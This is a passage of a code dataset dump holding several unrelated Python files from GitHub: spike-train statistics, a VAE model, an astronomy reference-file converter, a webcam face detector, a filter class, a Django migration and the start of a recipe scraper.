Spike trains can also be compared to produce correlation\n coefficients\n\n Parameters:\n '''\n\n def __init__(self): # Not sure what to do here yet\n pass\n\n def ISI_stats(self, spikemon):\n neuron_spikes = spikemon.spike_trains() # Dictionary with dict keys as neuron indices and\n # dict values as an array of spike times for that neuron\n firing_n = list(set(sort(spikemon.i))) # To create a set or list of all unique neuron indices that have spiked\n # in order to calculate statistical parameters for each unique neuron\n\n ISI = {} # Create an empty dictionary to contain dict keys as neuron indices and dict values as an array of ISIs\n ISI_mean = {} # Dict for ISI mean of each neuron index\n ISI_var = {} # Dict for ISI variance of each neuron index\n ISI_cv = {} # Dict for ISI co-efficient of variation (CV) for each neuron index\n\n # Calculate variance and mean of each ISI (Inter-Spike-Interval)\n for i in firing_n:\n # Calculate ISI array by subtracting spike times of each neuron to get an array of spike intervals\n ISI[i] = np.diff(neuron_spikes[i])\n # Calculate mean of ISI\n ISI_mean[i] = np.mean(ISI[i])\n # Calculate variance of ISI\n ISI_var[i] = np.var(ISI[i])\n # Calculate co-efficient of variation(CV) of ISI\n ISI_cv[i] = np.sqrt(ISI_var[i]) / ISI_mean[i]\n return ISI, ISI_mean, ISI_var, ISI_cv\n\n def spk_extract(self, spikemon, tstart, tend):\n '''\n This function splits up spike monitors into desired time intervals and outputs:\n - a dictionary of neuron indices with their corresponding spike times within the specified interval\n - an array of spike times generated within the time interval for the entire network irrespective of neuron indices\n - an array of neuron indices corresponding to spike times\n '''\n SN_t = []\n SN_i = []\n SN_mon = {}\n\n for neuron in arange(n):\n temp_time = [j for j in spikemon.spike_trains()[neuron] if j > tstart * ms and j <= tend * ms]\n SN_t.extend(temp_time[:])\n SN_mon[neuron] = temp_time\n SN_t = sort(SN_t)\n\n # This for loop is to return an array of neuron indices corresponding to spikes times. 
Identical to any\n # spikemonitor.i output\n for t in SN_t:\n for index in SN_mon.keys(): # iterating through neuron indices' spike trains\n for spike in SN_mon[index]: # iterating through values in spike trains\n if t == spike / ms:\n SN_i.append(index)\n flag = 1\n break\n else:\n flag = 0\n if flag == 1:\n break\n\n return SN_mon, SN_t, SN_i\n\n def spikebin_indv(self, sp_time, tstart, tend):\n '''\n This function takes in an array of spike times and counts the number of spikes occuring within a time interval\n defined by bin_size.\n It outputs an array of 0's and 1's to indicate whether or not a spike occured within an interval:\n - for each neuron (sp_ibinary)\n - bins: [t0,t0 + bin_size), [t1,t1 + bin_size).....\n '''\n\n sp_ibinary = {}\n t_interval = arange(tstart, tend, bin_size) # bin_size is a global parameter defined in the input section\n t_size = len(t_interval) + 1\n\n for k in range(0, len(sp_time)):\n temp = np.array([0] * t_size) # Converting to an array so that simulatenous assignment\n # to multiple indices is possible\n if sp_time[k] != []:\n bin_pos = ((sp_time[k] / (bin_size * ms)) - tstart / bin_size).astype(int)\n temp[bin_pos] = 1\n sp_ibinary[k] = temp\n\n return sp_ibinary\n\n def spikebin_total(self, sp_time, tstart, tend,bin_size):\n '''\n This function takes in an array of spike times and counts the number of spikes occuring within a time interval\n defined by bin_size.\n It outputs an array of the number of times a spike occured within an interval normalized by bin size:\n - for the overall network (sp_tbinary)\n - bins: [t0,t0 + bin_size), [t1,t1 + bin_size).....\n '''\n # Calculating binary spike train for the overall network\n t_interval = np.arange(tstart, tend, bin_size) # bin_size is a global parameter defined in the input section\n t_size = len(t_interval) + 1\n\n sp_tbinary = np.array([0] * t_size) # empty array to store the binary spike train\n sp_time_phase = [j for j in sp_time if\n j > tstart * ms and j <= tend * ms] # removes spike times above or below the\n # desired time interval\n for k in sp_time_phase:\n bin_pos = int((k / (bin_size * ms)) - tstart / bin_size)\n sp_tbinary[bin_pos] = 1 + sp_tbinary[bin_pos]\n\n sp_tbinary = sp_tbinary / bin_size\n\n return sp_tbinary\n\n def spike_cc(self, set1, set2):\n '''\n This function calculates Pearson product-moment correlation co-efficients of individual neuron spike trains\n '''\n # set1 = SN1_2_binary\n # set2 = SN2_2_binary\n final_CC = np.zeros((n, n))\n\n for i in set1:\n val1 = set1[i]\n for j in set2:\n val2 = set2[j]\n corr = np.corrcoef(val1, val2)\n final_CC[i][j] = corr[0, 1]\n return final_CC\n\n def spike_tcc(self, set1, set2):\n '''\n This function calculates Pearson product-moment correlation co-efficients by comparing\n spike trains of the total network (used for batch simulation)\n\n NOTE: Pearson product-moment correlation co-efficients is undefined for a constant time series like [1,1,1]\n because the variance/std is zero\n https://en.wikipedia.org/wiki/Pearson_correlation_coefficient\n '''\n if all(set1 == [1] * len(set1)) and all(\n set2 == [1] * len(set2)): # Check if all elements in both binary spike trains\n # are all 1s (if so Pearson method is undefined)\n corr = array([[1, 1], [1, 1]]) # set a value of 1 to show both spike trains are the same\n else:\n corr = np.corrcoef(set1, set2)\n\n return corr[0, 1]\n\n def batch_cc(self, SN1_2t, SN2_2t,phase1,phase2,bin_size):\n SN1_2_tbin = self.spikebin_total(SN1_2t, phase1, phase2,bin_size)\n SN2_2_tbin = 
self.spikebin_total(SN2_2t, phase1, phase2,bin_size)\n SN_2_tCC = self.spike_tcc(SN1_2_tbin, SN2_2_tbin)\n return SN_2_tCC\n\n # older func. Made newer one to cut down on unnecessary data\n def batch_cc_old(self, SN1, SN2):\n '''\n This function can be called each time a simulation is run to generate statistics of spike trains for each network\n and for each neuron within the networks\n\n SN0 is a spike monitor recording all spikes occuring in all neurons within a network\n SN0_all is a dictionary with spike times for corresponding neuron indices within the specified time period\n SN0_allt is an array of all spike times generated by the network within the time period\n SN0_ibin is a dictionary of binary spike trains corresponding to each neuron in the network\n SN0_tbin is the binary spike train of the network as a whole\n SN0_iCC is a matrix of correlation co-efficients generated by comparing all neurons in one network to another (N by N)\n SN0_tCC is a single number between -1 and 1 indicating how similar the overall binary spike train of one network is\n compared to the other\n '''\n # Extract spike times and corresponding neuron indices for each phase\n # Get a dictionary of neuron indices and corresponding spike times for each phase(1,2 or 3)\n # Get an array of overall network spike times for each phase, this will be used as input for PySpike functions\n\n # [SN0_all,SN0_allt] = stats.spk_extract(SN0,0,run_time)\n\n [SN1_1, SN1_1t, _] = self.spk_extract(SN1, 0, phase1)\n [SN2_1, SN2_1t, _] = self.spk_extract(SN2, 0, phase1)\n\n [SN1_2, SN1_2t, _] = self.spk_extract(SN1, phase1, phase2)\n [SN2_2, SN2_2t, _] = self.spk_extract(SN2, phase1, phase2)\n\n [SN1_3, SN1_3t, _] = self.spk_extract(SN1, phase2, phase3)\n [SN2_3, SN2_3t, _] = self.spk_extract(SN2, phase2, phase3)\n\n ##############################################################################\n # Create binary spike trains, put into stats class\n\n '''# Stand-alone network 1\n SN0_ibin = stats.spikebin_indv(SN0_all,0,run_time)\n SN0_tbin = stats.spikebin_total(SN0_allt,0,run_time)\n SN0_iCC = stats.spike_cc(SN0_ibin,SN0_ibin)\n SN0_tCC = stats.spike_tcc(SN0_tbin,SN0_tbin)'''\n\n # First phase of uncoupled networks\n # SN1_1_ibin = self.spikebin_indv(SN1_1,0,phase1)\n # SN2_1_ibin = self.spikebin_indv(SN2_1,0,phase1)\n # SN1_1_tbin = self.spikebin_total(SN1_1t,0,phase1)\n # SN2_1_tbin = self.spikebin_total(SN2_1t,0,phase1)\n # SN_1_iCC = self.spike_cc(SN1_1_ibin,SN2_1_ibin)\n # SN_1_tCC = self.spike_tcc(SN1_1_tbin,SN2_1_tbin)\n\n # Coupled networks\n SN1_2_ibin = self.spikebin_indv(SN1_2, phase1, phase2)\n SN2_2_ibin = self.spikebin_indv(SN2_2, phase1, phase2)\n SN1_2_tbin = self.spikebin_total(SN1_1t, phase1, phase2)\n SN2_2_tbin = self.spikebin_total(SN2_1t, phase1, phase2)\n SN_2_iCC = self.spike_cc(SN1_2_ibin, SN2_2_ibin)\n SN_2_tCC = self.spike_tcc(SN1_2_tbin, SN2_2_tbin)\n\n # Second phase of uncoupled networks\n # SN1_3_ibin = self.spikebin_indv(SN1_3,phase2,phase3)\n # SN2_3_ibin = self.spikebin_indv(SN2_3,phase2,phase3)\n # SN1_3_tbin = self.spikebin_total(SN1_3t,phase2,phase3)\n # SN2_3_tbin = self.spikebin_total(SN2_3t,phase2,phase3)\n # SN_3_iCC = self.spike_cc(SN1_3_ibin,SN2_3_ibin)\n # SN_3_tCC = self.spike_tcc(SN1_3_tbin,SN2_3_tbin)\n\n return SN_2_tCC","repo_name":"KokilaP/Neural-Networks","sub_path":"lib/Spike_Stats.py","file_name":"Spike_Stats.py","file_ext":"py","file_size_in_byte":10541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} 
+{"seq_id":"33902280540","text":"# -*- coding: utf-8 -*-\n\n# 프롬프트와 사용자\n\n# 11장과 비슷하지만 y = input(\"이름?\") 처럼 이름? 을 물어보고 그답을 변수 y에 넣는 식으로 사용자에게 질문하고 답을 받을수있습니다.\nage = (input(\"몇 살이죠? \"))\nheight = (input(\"키는 얼마죠?\"))\nweight = (input(\"몸무게는 얼마죠? \"))\n\nprint(\"네, 나이는 %r 살, 키는 %r ,몸무게는%r이네요.\" %(age,height,weight))\nprint(\"뜸금없지만, 태양의 각지름은%r 정도입니다.\" % '''32'10''')\n\n# %r:은 디버그용이고 '코드를 쓴대로' 보여주는것 / %s:출력용\n","repo_name":"Ahnho/python","sub_path":"HW12.py","file_name":"HW12.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"70965329672","text":"import tensorflow as tf\r\nfrom tensorflow.keras import layers\r\nfrom tensorflow import keras\r\nimport numpy as np\r\n\r\nclass Sampling(tf.keras.layers.Layer):\r\n \"\"\"Uses (z_mean, z_log_var) to sample z, the vector encoding a digit.\"\"\"\r\n\r\n def call(self, inputs):\r\n z_mean, z_log_var = inputs\r\n batch = tf.shape(z_mean)[0]\r\n dim = tf.shape(z_mean)[1]\r\n epsilon = tf.random.normal(shape=(batch, dim))\r\n return z_mean + tf.exp(0.5 * z_log_var) * epsilon\r\n\r\n\r\nclass PositionEncoder(layers.Layer):\r\n def __init__(self, num_patches, projection_dim):\r\n super(PositionEncoder, self).__init__()\r\n self.num_patches = num_patches\r\n self.projection = layers.Dense(units=projection_dim)\r\n self.position_embedding = layers.Embedding(\r\n input_dim=num_patches, output_dim=projection_dim\r\n )\r\n\r\n def call(self, patch):\r\n positions = tf.range(start=0, limit=self.num_patches, delta=1)\r\n encoded = self.projection(patch) + self.position_embedding(positions)\r\n return encoded\r\n \r\ndef positional_encoding(num_patches, projection_dim):\r\n depth = projection_dim / 2\r\n\r\n positions = np.arange(num_patches)[:, np.newaxis] # (num_patches, 1)\r\n depths = np.arange(depth)[np.newaxis, :] / depth # (1, depth)\r\n\r\n angle_rates = 1 / (10000**depths) # (1, depth)\r\n angle_rads = positions * angle_rates # (num_patches, depth)\r\n\r\n pos_encoding = np.concatenate(\r\n [np.sin(angle_rads), np.cos(angle_rads)],\r\n axis=-1)\r\n\r\n return tf.cast(pos_encoding, dtype=tf.float32)\r\n\r\nclass AngularPositionEncoder(layers.Layer):\r\n def __init__(self, num_patches, projection_dim):\r\n super(AngularPositionEncoder, self).__init__()\r\n self.num_patches = num_patches\r\n self.projection = layers.Dense(units=projection_dim)\r\n\r\n def call(self, patch):\r\n pos_encoding = positional_encoding(self.num_patches, self.projection.units)\r\n encoded = self.projection(patch) + pos_encoding[tf.newaxis, ...]\r\n return encoded\r\n\r\n\r\ndef choose_model(encoder_type,\r\n decoder_type, \r\n latent_dim,\r\n time_step,\r\n feature_num,\r\n d_model,\r\n num_heads,\r\n num_transformer_blocks,\r\n activation='tanh',\r\n position_encoder=None,\r\n encoder_encoding=False,\r\n decoder_encoding=False):\r\n\r\n \"\"\"\r\n Construct an encoder-decoder model architecture for sequence-to-sequence tasks.\r\n\r\n Parameters:\r\n encoder_type (str): Type of encoder to use ('LSTM' or 'Transformer').\r\n decoder_type (str): Type of decoder to use ('LSTM' or 'Transformer').\r\n latent_dim (int): Dimensionality of the latent space.\r\n time_step (int): Number of time steps in input sequences.\r\n feature_num (int): Number of features at each time step.\r\n d_model (int): Dimensionality of the Transformer model.\r\n num_heads (int): Number of Transformer heads.\r\n num_transformer_blocks (int): Number of Transformer blocks to stack.\r\n activation (str): 
Activation function for the model layers (default is 'tanh').\r\n position_encoder (str, optional): Type of positional encoding ('angular', 'embedding', or None).\r\n encoder_encoding (bool, optional): Apply positional encoding to encoder input sequences (for Transformer encoder).\r\n decoder_encoding (bool, optional): Apply positional encoding to decoder input sequences (for Transformer decoder).\r\n \r\n Returns:\r\n encoder (tf.keras.Model): Constructed encoder model.\r\n decoder (tf.keras.Model): Constructed decoder model.\r\n \"\"\"\r\n\r\n if encoder_type == 'LSTM':\r\n encoder_inputs = keras.Input(shape=(time_step, feature_num))\r\n x = tf.keras.layers.LSTM(128, activation=activation, dropout=0.1, return_sequences=True)(encoder_inputs)\r\n x = tf.keras.layers.LSTM(64, activation=activation, dropout=0.1,return_sequences=False)(x)\r\n # x = layers.Dense(256, activation=activation)(x)\r\n z_mean = layers.Dense(latent_dim, name=\"z_mean\")(x)\r\n z_log_var = layers.Dense(latent_dim, name=\"z_log_var\")(x)\r\n z = Sampling()([z_mean, z_log_var])\r\n encoder = keras.Model(encoder_inputs, [z_mean, z_log_var, z], name=\"encoder\")\r\n encoder.summary()\r\n elif encoder_type == 'Transformer':\r\n encoder_inputs = keras.Input(shape=(time_step, feature_num))\r\n if position_encoder == 'angular' and encoder_encoding:\r\n x = AngularPositionEncoder(time_step, d_model)(encoder_inputs)\r\n elif position_encoder == 'embedding' and encoder_encoding:\r\n x = PositionEncoder(time_step, d_model)(encoder_inputs)\r\n else:\r\n x = tf.keras.layers.Dense(units=d_model)(encoder_inputs)\r\n\r\n for _ in range(num_transformer_blocks):\r\n x = tf.keras.layers.MultiHeadAttention(num_heads=num_heads, key_dim=d_model//num_heads)(x, x)\r\n x_h = layers.LayerNormalization(epsilon=1e-6)(x)\r\n x_h = layers.Dropout(0.1)(x_h)\r\n# x = layers.Add()([x, x_h])\r\n x = x_h\r\n x = layers.LayerNormalization(epsilon=1e-6)(x)\r\n x_h = layers.Dense(d_model * 2, activation=activation)(x)\r\n x_h = layers.Dense(d_model, activation=activation)(x_h)\r\n# x = layers.Add()([x, x_h])\r\n x = x_h\r\n\r\n x = tf.keras.layers.GlobalAveragePooling1D()(x)\r\n\r\n z_mean = layers.Dense(latent_dim, name=\"z_mean\")(x)\r\n z_log_var = layers.Dense(latent_dim, name=\"z_log_var\")(x)\r\n z = Sampling()([z_mean, z_log_var])\r\n encoder = keras.Model(encoder_inputs, [z_mean, z_log_var, z], name=\"encoder\")\r\n encoder.summary()\r\n \r\n if decoder_type == 'LSTM':\r\n \r\n latent_inputs = keras.Input(shape=(latent_dim,))\r\n x = layers.Dense(time_step * feature_num, activation=activation)(latent_inputs)\r\n x = layers.Reshape((time_step, feature_num))(x)\r\n x = tf.keras.layers.LSTM(32, activation=activation, return_sequences=True)(x)\r\n x = tf.keras.layers.LSTM(64, activation=activation, return_sequences=True)(x)\r\n decoder_outputs = tf.keras.layers.LSTM(feature_num, activation=activation, return_sequences=True)(x)\r\n# decoder_outputs = tf.keras.layers.Lambda(lambda x: x * threshold)(decoder_outputs)\r\n decoder = keras.Model(latent_inputs, decoder_outputs, name=\"decoder\")\r\n decoder.summary()\r\n\r\n elif decoder_type == 'Transformer':\r\n \r\n latent_inputs = keras.Input(shape=(latent_dim,))\r\n x = layers.Dense(time_step * feature_num, activation=activation)(latent_inputs)\r\n x = layers.Reshape((time_step, feature_num))(x) \r\n if position_encoder == 'angular' and decoder_encoding:\r\n x = AngularPositionEncoder(time_step, d_model)(x)\r\n elif position_encoder == 'embedding' and decoder_encoding:\r\n x = PositionEncoder(time_step, 
d_model)(x)\r\n else:\r\n x = tf.keras.layers.Dense(units=d_model)(x)\r\n\r\n for _ in range(num_transformer_blocks):\r\n x = tf.keras.layers.MultiHeadAttention(num_heads=num_heads, key_dim=d_model//num_heads)(x, x)\r\n x_h = layers.LayerNormalization(epsilon=1e-6)(x)\r\n x_h = layers.Dropout(0.1)(x_h)\r\n# x = layers.Add()([x, x_h])\r\n x = x_h\r\n x = layers.LayerNormalization(epsilon=1e-6)(x)\r\n x_h = layers.Dense(d_model * 2, activation=activation)(x)\r\n x_h = layers.Dense(d_model, activation=activation)(x_h)\r\n x = x_h\r\n# x = layers.Add()([x, x_h])\r\n\r\n decoder_output = layers.Dense(feature_num)(x)\r\n\r\n\r\n decoder = keras.Model(latent_inputs, decoder_output, name=\"decoder\")\r\n decoder.summary()\r\n \r\n return encoder, decoder\r\n\r\n\r\n\r\n\r\nclass VAE(tf.keras.Model):\r\n def __init__(self, encoder, decoder, loss_type, kl_weights, **kwargs):\r\n super().__init__(**kwargs)\r\n self.encoder = encoder\r\n self.decoder = decoder\r\n self.loss_type = loss_type\r\n self.kl_weights = kl_weights # (kl_weight, kl_weight_start, kl_decay_rate)\r\n\r\n self.total_loss_tracker = keras.metrics.Mean(name=\"total_loss\")\r\n self.reconstruction_loss_tracker = keras.metrics.Mean(\r\n name=\"reconstruction_loss\"\r\n )\r\n self.kl_loss_tracker = keras.metrics.Mean(name=\"kl_loss\")\r\n \r\n self.val_total_loss_tracker = keras.metrics.Mean(name=\"val_total_loss\")\r\n self.val_reconstruction_loss_tracker = keras.metrics.Mean(\r\n name=\"val_reconstruction_loss\"\r\n )\r\n self.val_kl_loss_tracker = keras.metrics.Mean(name=\"val_kl_loss\")\r\n\r\n\r\n @property\r\n def metrics(self):\r\n return [\r\n self.total_loss_tracker,\r\n self.reconstruction_loss_tracker,\r\n self.kl_loss_tracker,\r\n self.val_total_loss_tracker,\r\n self.val_reconstruction_loss_tracker,\r\n self.val_kl_loss_tracker,\r\n ]\r\n\r\n def train_step(self, data):\r\n if self.loss_type == 'mae':\r\n loss = keras.losses.mae\r\n elif self.loss_type == 'mse':\r\n loss = keras.losses.mse\r\n\r\n kl_weight = self.kl_weights[0]\r\n kl_weight_start = self.kl_weights[1]\r\n kl_decay_rate = self.kl_weights[2]\r\n\r\n \r\n step = tf.cast(self.optimizer.iterations, tf.float32)\r\n klw = kl_weight - (kl_weight - kl_weight_start) * kl_decay_rate ** step\r\n with tf.GradientTape() as tape:\r\n z_mean, z_log_var, z = self.encoder(data, training=True)\r\n reconstruction = self.decoder(z, training=True)\r\n reconstruction_loss = tf.reduce_mean(\r\n tf.reduce_sum(\r\n loss(data, reconstruction), axis=1\r\n )\r\n )\r\n kl_loss = -klw * (1 + z_log_var - tf.square(z_mean) - tf.exp(z_log_var))\r\n kl_loss = tf.reduce_mean(tf.reduce_sum(kl_loss, axis=1))\r\n total_loss = reconstruction_loss + kl_loss\r\n grads = tape.gradient(total_loss, self.trainable_weights)\r\n \r\n self.optimizer.apply_gradients(zip(grads, self.trainable_weights))\r\n self.total_loss_tracker.update_state(total_loss)\r\n self.reconstruction_loss_tracker.update_state(reconstruction_loss)\r\n self.kl_loss_tracker.update_state(-0.5 * (1 + z_log_var - tf.square(z_mean) - tf.exp(z_log_var)))\r\n return {\r\n \"loss\": self.total_loss_tracker.result(),\r\n \"reconstruction_loss\": self.reconstruction_loss_tracker.result(),\r\n \"kl_loss\": self.kl_loss_tracker.result(),\r\n }\r\n \r\n \r\n def test_step(self, data):\r\n if self.loss_type == 'mae':\r\n loss = keras.losses.mae\r\n elif self.loss_type == 'mse':\r\n loss = keras.losses.mse\r\n \r\n z_mean, z_log_var, z = self.encoder(data, training=False)\r\n reconstruction = self.decoder(z, training=False)\r\n 
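# Added note: the KL term below is the closed-form KL divergence between the\r\n        # approximate posterior N(z_mean, exp(z_log_var)) and the standard normal\r\n        # prior: KL = -0.5 * sum(1 + z_log_var - z_mean**2 - exp(z_log_var)).\r\n        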
reconstruction_loss = tf.reduce_mean(\r\n tf.reduce_sum(\r\n loss(data, reconstruction), axis=1\r\n )\r\n )\r\n kl_loss = -0.5 * (1 + z_log_var - tf.square(z_mean) - tf.exp(z_log_var))\r\n kl_loss = tf.reduce_mean(tf.reduce_sum(kl_loss, axis=1))\r\n total_loss = reconstruction_loss + kl_loss\r\n self.val_total_loss_tracker.update_state(total_loss)\r\n self.val_reconstruction_loss_tracker.update_state(reconstruction_loss)\r\n self.val_kl_loss_tracker.update_state(kl_loss)\r\n return {\r\n \"loss\": self.val_total_loss_tracker.result(),\r\n \"reconstruction_loss\": self.val_reconstruction_loss_tracker.result(),\r\n \"kl_loss\": self.val_kl_loss_tracker.result(),\r\n }\r\n ","repo_name":"yasaminborhani/Clustering_Trajectories_VAE","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":12215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"30600122429","text":"import datetime\nfrom .utils import pcf2model\nfrom jwst.datamodels import CameraModel\nfrom asdf.tags.core import Software, HistoryEntry\n\n__all__ = [\"create_camera_reference\", \"camera2asdf\"]\n\ndef camera2asdf(camera_refname, author, description, useafter):\n try:\n model = pcf2model(camera_refname, name='camera')\n except:\n print(\"Camera file was not converted.\")\n raise\n camera_model = CameraModel(model=model)\n camera_model.meta.author = author\n camera_model.meta.description = description\n camera_model.meta.pedigree = \"GROUND\"\n camera_model.meta.title = \"NIRSPEC CAMERA file\"\n camera_model.meta.useafter = useafter\n entry = HistoryEntry({'description': \"New version created from CV3 with updated file structure\", 'time': datetime.datetime.utcnow()})\n software = Software({'name': 'jwstreftools', 'author': 'N.Dencheva',\n 'homepage': 'https://github.com/spacetelescope/jwreftools', 'version': \"0.7.1\"})\n entry['software'] = software\n camera_model.history.append(entry)\n\n return camera_model\n\ndef create_camera_reference(camera_refname, out_name, author=None, description=None, useafter=None):\n with open(camera_refname) as f:\n lines = f.readlines()\n lines = [l.strip() for l in lines]\n for i, line in enumerate(lines):\n if 'AUTHOR' in line:\n auth = lines[i + 1]\n continue\n elif 'DESCRIPTION' in line:\n descrip = lines[i + 1]\n continue\n elif 'DATE' in line:\n date = lines[i + 1]\n continue\n\n if author is None:\n author = auth\n if description is None:\n description = descrip\n if useafter is None:\n useafter = date\n\n try:\n model = camera2asdf(camera_refname, author, description, useafter)\n except:\n raise\n model.to_asdf(out_name)\n new_model = CameraModel(out_name)\n new_model.validate()\n\n#if __name__ == '__main__':\n #import argpars\n #parser = argpars.ArgumentParser(description=\"Creates NIRSpec 'camera' reference file in ASDF format.\")\n #parser.add_argument(\"camera_file\", type=str, help=\"Camera file.\")\n #parser.add_argument(\"output_name\", type=str, help=\"Output file name\")\n #res = parser.parse_args()\n #if res.output_name is None:\n #output_name = \"nirspec_camera.asdf\"\n #else:\n #output_name = res.output_name\n\n #ref_kw = common_reference_file_keywords(\"CAMERA\", \"NIRSPEC Camera Model - CDP4\")\n\n #camera2asdf(camera_file, output_name, 
ref_kw)\n","repo_name":"spacetelescope/jwreftools","sub_path":"jwreftools/nirspec/camera2asdf.py","file_name":"camera2asdf.py","file_ext":"py","file_size_in_byte":2534,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"}
+{"seq_id":"7632725080","text":"import sys\n\nimport cv2\nfacecascade=cv2.CascadeClassifier('D:\\\\faceRecognition-master\\\\haarcascade_frontalface.xml')\nvideocapt=cv2.VideoCapture(0)\nwhile True:\n    retval,frame=videocapt.read()\n    gray=cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)\n    faces=facecascade.detectMultiScale(gray,scaleFactor=1.1,minNeighbors=5,minSize=(35,35))\n    for x,y,w,h in faces:\n        cv2.rectangle(frame,(x,y),(x+w,y+h),(50,200,50),2)\n    cv2.imshow('Video',frame)\n    if cv2.waitKey(1) & 0xFF==ord('q'):\n        sys.exit()\n","repo_name":"NIKHILDUGAR/FaceDetectionOpenCV","sub_path":"main file.py","file_name":"main file.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"}
+{"seq_id":"37122100064","text":"import re\nfrom typing import *\n\n\nclass Filter:\n    def __init__(self, **kwargs):\n        # any argument matching the pattern is accepted\n        for attribute in kwargs:\n            if not (re.match(r'\\w+__\\w+__$', attribute) or attribute == \"operator\"):\n                raise ValueError(f\"{attribute} does not match expected attribute format.\")\n        self.__dict__.update(kwargs)\n        if \"operator\" not in self.__dir__():\n            self.operator = \"AND\"\n\n    def __eq__(self, other):\n        # -> tested\n        # check that all non-hidden attributes of this class\n        # are present in the other object\n        # and match the corresponding attributes of the other object\n        attributes = [attr for attr in self.__dir__() if not (attr.startswith(\"__\") or attr == \"operator\")]\n        checks = []\n        try:\n            for attr in attributes:\n                attribute = \"__\".join(attr.split(\"__\")[0:-2])\n                magic_method = \"__\" + attr.split(\"__\")[-2] + \"__\"\n                value = self.__getattribute__(attr)\n                other_value = other.__getattribute__(attribute)\n                checks.append(value.__getattribute__(magic_method)(other_value))\n        except AttributeError:\n            # when an attribute is not present in the other object, abort\n            return False\n        # return True only if\n        # all attributes of this filter are present in the other object\n        # and the values match via the magic method\n        return False not in checks\n\n    def __str__(self, logical_condition: Optional[str] = None):\n        # -> tested\n        # Returns a string suitable for SQL-style databases\n        attributes = [a for a in self.__dir__() if not (a.startswith(\"__\") or a == \"operator\")]\n        for attr in range(len(attributes)):\n            a = attributes[attr] + str(self.__getattribute__(attributes[attr]))\n            a = a.replace(\"__eq__\", \"=\")\n            a = a.replace(\"__ne__\", \"!=\")\n            a = a.replace(\"__lt__\", \"<\")\n            a = a.replace(\"__gt__\", \">\")\n            a = a.replace(\"__lte__\", \"<=\")\n            a = a.replace(\"__gte__\", \">=\")\n            a = a.replace(\"__contains__\", \" BETWEEN \")\n            attributes[attr] = a\n        return str.join(f\" {(logical_condition or self.operator).upper()} \", attributes)\n\n    def __bool__(self):\n        return bool(len([a for a in self.__dir__() if not (a.startswith(\"__\") or a == \"operator\")]))\n
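\n# Example (added note): equality applies the stored value's magic method to the\n# other object's attribute, i.e. Filter(age__gt__=3) == obj evaluates\n# (3).__gt__(obj.age). For SQL output, str(Filter(age__gt__=3)) yields \"age>3\",\n# and multiple attributes are joined with the operator (default \"AND\").\n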
\n\nif __name__ == \"__main__\":\n    import tests\n    tests.run_tests()\n","repo_name":"MakerStuff/Vertretungsplangak_Bot","sub_path":"filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":2482,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"}
+{"seq_id":"30272733376","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('faq', '0004_auto_20141126_1328'),\n    ]\n\n    operations = [\n        migrations.AlterField(\n            model_name='faqentry',\n            name='position',\n            field=models.PositiveSmallIntegerField(),\n            preserve_default=True,\n        ),\n    ]\n","repo_name":"mgaebler/product_test","sub_path":"django_app/faq/migrations/0005_auto_20141205_1142.py","file_name":"0005_auto_20141205_1142.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"10577825665","text":"from bs4 import BeautifulSoup\nimport requests\nfrom re import sub\nimport re\nimport json\nimport pdb\n\ndirectory = \"recipes/\"\n\n# \"dovlecei\": [{\"unit\": \"lingura\", \"amount\": \"3\"},\n#              {\"unit\": \"kg\", \"amount\": \"5\"}]\n\nrecipe = {}  # not an actual recipe, more like a shopping-cart list\n\n\ndef custom_merge(dictionary, subdictionary, ingredient_name):\n    # merge `subdictionary` into the entry list for `ingredient_name`:\n    # same unit -> sum the amounts; new unit -> append a new entry\n    if ingredient_name in dictionary:\n        for i in range(len(dictionary[ingredient_name])):\n            if dictionary[ingredient_name][i]['unit'] == subdictionary['unit']:\n                try:\n                    dictionary[ingredient_name][i]['amount'] = float(dictionary[ingredient_name][i]['amount']) + float(\n                        subdictionary['amount'])\n                except ValueError as error:\n                    print(error)\n                break\n            if i == len(dictionary[ingredient_name]) - 1 and dictionary[ingredient_name][i]['unit'] != subdictionary[\n                'unit']:\n                dictionary[ingredient_name].append(subdictionary)\n                dictionary[ingredient_name][-1]['amount'] = float(dictionary[ingredient_name][-1]['amount'])\n\n    else:\n        dictionary[ingredient_name] = [subdictionary]\n        dictionary[ingredient_name][-1]['amount'] = float(dictionary[ingredient_name][-1]['amount'])\n\n
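\n# Example (added, illustrative): with cart = {\"dovlecei\": [{\"unit\": \"kg\", \"amount\": 1.0}]},\n# custom_merge(cart, {\"unit\": \"kg\", \"amount\": \"2\"}, \"dovlecei\") sums the amounts to\n# [{\"unit\": \"kg\", \"amount\": 3.0}], while a different unit is appended as its own entry.\n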
\ndef scrapeRecipe(link):\n    page = requests.get(link)\n    soup = BeautifulSoup(page.text, 'html.parser')\n\n    # recipe title\n    title = soup.select('.tdb-title-text')[0].text.strip().replace(\"/\", \"\").split(\"–\")[0]\n    print(\"recipe name:\", title)\n\n    # the ingredient groups -> e.g. the zucchini recipe has 2: for zucchini in batter / in breadcrumb crust\n    ingredient_groups = soup.select('.wprm-recipe-ingredient-group')\n\n    for j in ingredient_groups:\n        group_ingredients_unparsed = j.select('.wprm-recipe-ingredients > .wprm-recipe-ingredient')\n        for i in group_ingredients_unparsed:\n            ingredient_amount = i.select('.wprm-recipe-ingredient-amount')\n            ingredient_amount_parsed = ''\n            if ingredient_amount:\n                ingredient_amount_parsed = i.select('.wprm-recipe-ingredient-amount')[0].text.strip()\n\n            ingredient_unit = i.select('.wprm-recipe-ingredient-unit')\n            ingredient_unit_parsed = ''\n            if ingredient_unit:\n                ingredient_unit_parsed = i.select('.wprm-recipe-ingredient-unit')[0].text.strip()\n\n            ingredient_name = 